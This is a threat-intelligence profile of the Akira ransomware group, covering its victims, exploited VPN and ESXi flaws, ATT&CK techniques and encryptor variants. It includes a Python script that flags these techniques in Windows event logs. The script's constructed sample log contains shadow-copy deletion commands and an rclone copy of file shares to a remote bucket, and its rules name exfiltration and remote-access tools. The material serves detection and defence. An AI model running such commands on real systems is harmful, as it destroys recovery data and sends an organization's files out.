Akira Ransomware: The Extortion Ghost in a Shell

Akira has targeted a range of organizations, including universities (Stanford), major IT service providers (Tietoevry), and numerous businesses across various sectors. Critical infrastructure, including healthcare systems, has also been impacted.

    Overview of Akira Ransomware:

    • Active Threat: Akira is an active and prolific ransomware group operating globally.
    • High-Profile Targets: Akira has targeted a range of organizations, including universities (Stanford), major IT service providers (Tietoevry), and numerous businesses across various sectors. Critical infrastructure, including healthcare systems, has also been impacted.
    • Sophisticated Tactics: The group exploits known vulnerabilities in edge devices (the Cisco ASA/FTD VPN flaws CVE-2020-3259 and CVE-2023-20269) and was named by Microsoft among the ransomware families deployed through CVE-2024-37085 in VMware ESXi. It also gains entry with stolen credentials, particularly on VPN services that lack multi-factor authentication.
    • Double Extortion: Akira operates a double-extortion model: data is exfiltrated before encryption, and the ransom demand covers both a decryptor and non-publication of the stolen data. The Stanford attack clearly involved data exfiltration.
    • Evolving Techniques: Akira adapts its methods, using multiple encryptor variants and targeting both Windows and Linux systems. Its Linux encryptor for VMware ESXi, and the later use of the ESXi vulnerability, show a deliberate shift toward hypervisors, where a single host holds many of a victim's virtual machines.
    • Global Reach: Attacks have been observed in North America, Europe, and Australia, indicating a wide geographical range of operations.

    Known Aliases:

    “Akira” is the only documented name for this group; no alternative alias is tracked. Its encryptors, however, carry distinct names (Akira, Megazord, Akira_v2), listed under Malware/Ransomware Strain(s) below.

    Country of Origin:

    Not known.

    Most Recent Attacks:

    • Stanford University (March 2024): Data of approximately 27,000 individuals was stolen from the Department of Public Safety network in an attack attributed to Akira. The data compromised varied by individual but could include Social Security numbers, driver’s license numbers, and in some cases biometric data and credit card information.
    • Regency Media (Australia): Akira claimed an attack on the defunct Australian media company Regency Media and the theft of more than 16 GB of data, highlighting the risk posed by unmanaged legacy data after a business closes.
    • Tietoevry (January 2024): An Akira ransomware attack on one of Tietoevry's data centers in Sweden caused widespread disruption for numerous customers, including government agencies, universities, healthcare providers, and businesses such as Filmstaden (cinema chain), Rusta (discount retail), Moelven (building materials), and Granngården (farming supplier). The attack took down payroll, HR, and in some cases healthcare record systems.
    • Multiple Organizations (July 2024): Microsoft warned of active exploitation of CVE-2024-37085, an authentication bypass affecting VMware ESXi hosts joined to Active Directory, by several ransomware operators, including ones deploying Akira and Black Basta. The intrusion Microsoft detailed, at a North American engineering firm, began with Qakbot and credential theft and then abused the ESXi flaw to encrypt the hypervisor; that particular case ended in Black Basta deployment, with Akira named as another family delivered through the same technique.

    Recent Akira Ransomware Activity:

    • Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities across North America, Europe, and Australia.
    • As of January 1, 2024, over 250 organizations had been affected, and the group had collected approximately $42 million (USD) in ransomware proceeds.
    • In April 2023 the group shifted tactics, deploying a Linux variant that targets VMware ESXi virtual machines and so expanding its attack surface beyond Windows systems.
    • The most recent activity reflected in FBI investigations dates from February 2024. Specific victim names are not disclosed, to protect their identities.

    MITRE ATT&CK Tactics and Techniques of Akira Ransomware:

    • Initial Access:
      • T1078: Valid Accounts (abuse of compromised credentials)
      • T1190: Exploit Public-Facing Application (known Cisco ASA/FTD vulnerabilities CVE-2020-3259 and CVE-2023-20269)
      • T1133: External Remote Services (RDP and VPN services, notably VPN access without multi-factor authentication)
      • T1566.001: Phishing: Spearphishing Attachment
      • T1566.002: Phishing: Spearphishing Link
    • Persistence:
      • T1136.002: Create Account: Domain Account (new domain accounts, including an administrative account named “itadm”)
    • Privilege Escalation:
      • T1078: Valid Accounts (re-use of credentials harvested with the dumping tools listed under Credential Access)
    • Discovery:
      • T1016: System Network Configuration Discovery (SoftPerfect Network Scanner and Advanced IP Scanner)
      • T1018: Remote System Discovery (net commands to locate domain controllers)
      • T1482: Domain Trust Discovery (nltest)
    • Defense Evasion:
      • T1562.001: Impair Defenses: Disable or Modify Tools (terminating security software with PowerTool, which abuses the Zemana AntiMalware driver)
    • Credential Access:
      • T1003: OS Credential Dumping (Mimikatz and LaZagne)
      • T1003.001: OS Credential Dumping: LSASS Memory (credentials read from LSASS memory)
      • T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting
    • Command and Control:
      • T1219: Remote Access Software (AnyDesk, MobaXterm, RustDesk)
      • T1572: Protocol Tunneling (Ngrok, Cloudflare Tunnel)
      • T1090.002: Proxy: External Proxy (C2 routed through intermediary infrastructure)
    • Exfiltration:
      • T1048: Exfiltration Over Alternative Protocol (FileZilla, WinSCP, RClone; WinRAR used to stage archives)
      • T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage (RClone to cloud storage)
    • Impact:
      • T1486: Data Encrypted for Impact (Akira and Megazord encryptors)
      • T1490: Inhibit System Recovery (deletion of Volume Shadow Copies)
      • T1657: Financial Theft (ransom demand under the double-extortion model)
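    A detection pass over the technique list above, written here as an added example and not code from the original page or from any vendor: it reads Windows Security event records (4720 account creation, 4688 process creation) as JSON lines and reports which of the techniques attributed to Akira each record matches, so an analyst can see at a glance whether an intrusion has reached the shadow-copy-deletion stage that precedes encryption. The event records are constructed for illustration, and the executable names assumed for PowerTool, SoftPerfect and Cloudflare Tunnel are assumptions, since the profile names the tools but not their binaries.

```python
"""Flag Akira-associated TTPs in Windows Security event records.

Added example: rules map to the ATT&CK IDs in the profile above. The sample
records are constructed, not real victim logs. Binary names the profile does
not state (PowerTool64.exe, netscan.exe for SoftPerfect, cloudflared.exe for
Cloudflare Tunnel) are assumptions.
"""
import json
import re
from collections import Counter

# (technique ID, description, Windows EventID, field to inspect, regex)
RULES = [
    ("T1136.002", "domain account created with Akira-observed name", 4720,
     "TargetUserName", r"^itadm$"),
    ("T1490", "Volume Shadow Copy deletion", 4688, "CommandLine",
     r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete|win32_shadowcopy.*delete"),
    ("T1562.001", "PowerTool launched (Zemana driver abuse)", 4688,
     "NewProcessName", r"powertool"),            # binary name assumed
    ("T1482", "domain trust enumeration via nltest", 4688, "CommandLine",
     r"nltest.*/domain_trusts"),
    ("T1016", "network scanner executed", 4688, "NewProcessName",
     r"advanced_ip_scanner|netscan"),            # netscan.exe assumed for SoftPerfect
    ("T1048", "exfiltration tooling executed", 4688, "NewProcessName",
     r"rclone|winscp|filezilla"),
    ("T1219", "remote access software executed", 4688, "NewProcessName",
     r"anydesk|rustdesk|mobaxterm"),
    ("T1572", "tunneling client executed", 4688, "NewProcessName",
     r"ngrok|cloudflared"),                      # cloudflared assumed
]

# Constructed sample records (JSON lines). Raw string so the JSON "\\" escapes
# reach the parser intact.
SAMPLE_LOG = r"""
{"EventID": 4624, "TargetUserName": "jdoe", "Computer": "WS01"}
{"EventID": 4720, "TargetUserName": "itadm", "SubjectUserName": "jdoe", "Computer": "DC01"}
{"EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\nltest.exe", "CommandLine": "nltest /domain_trusts /all_trusts", "Computer": "WS01"}
{"EventID": 4688, "NewProcessName": "C:\\Users\\jdoe\\Downloads\\PowerTool64.exe", "CommandLine": "PowerTool64.exe", "Computer": "WS01"}
{"EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}", "Computer": "FS01"}
{"EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin.exe delete shadows /all /quiet", "Computer": "FS01"}
{"EventID": 4688, "NewProcessName": "C:\\Tools\\rclone.exe", "CommandLine": "rclone copy D:\\Shares remote:bucket", "Computer": "FS01"}
{"EventID": 4688, "NewProcessName": "C:\\Program Files\\Notepad++\\notepad++.exe", "CommandLine": "notepad++.exe", "Computer": "WS01"}
"""


def parse_events(lines):
    """Parse JSON-lines records; skip blank or malformed lines instead of aborting."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def detect(events):
    """Return (technique_id, description, event) for every rule an event matches."""
    hits = []
    for ev in events:
        for tid, desc, eid, field, pattern in RULES:
            if ev.get("EventID") != eid:
                continue
            if re.search(pattern, str(ev.get(field, "")), re.IGNORECASE):
                hits.append((tid, desc, ev))
    return hits


def summarize(hits):
    """Count hits per technique; a non-zero T1490 count means encryption is imminent."""
    return Counter(tid for tid, _, _ in hits)


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_LOG.splitlines()))
    for tid, desc, ev in found:
        print(f"{tid:10} {desc:50} host={ev.get('Computer')}")
    print(dict(summarize(found)))
```

    The rules deliberately key on command-line content for the shadow-copy and nltest checks, because both the vssadmin and the PowerShell WMI paths to deleting shadow copies run through a legitimate signed binary; matching on image name alone would miss the WMI route entirely.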

    Common Methods of Infiltration:

    The Akira ransomware group employs a multi-faceted approach to infiltration:

    • Exploitation of vulnerabilities: Specifically targeting known vulnerabilities in Cisco ASA/FTD VPN appliances (CVE-2020-3259 and CVE-2023-20269) and other publicly facing applications.
    • Phishing: Using spear-phishing emails containing malicious attachments or links.
    • Credential abuse: Using compromised or stolen credentials to gain access.
    • Remote access abuse: Logging in to Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services with those credentials, most often where the VPN has no multi-factor authentication configured.

    Malware/Ransomware Strain(s):

    • Akira: The primary ransomware variant, initially written in C++ and appending the .akira extension to encrypted files. Later builds, described below, moved to Rust.
    • Megazord: A Rust-based variant used interchangeably with Akira, appending the .powerranges extension to encrypted files.
    • Akira_v2: A newer Rust-based build of the Akira ESXi (Linux) encryptor, identified through third-party investigations, with expanded functionality over the original.
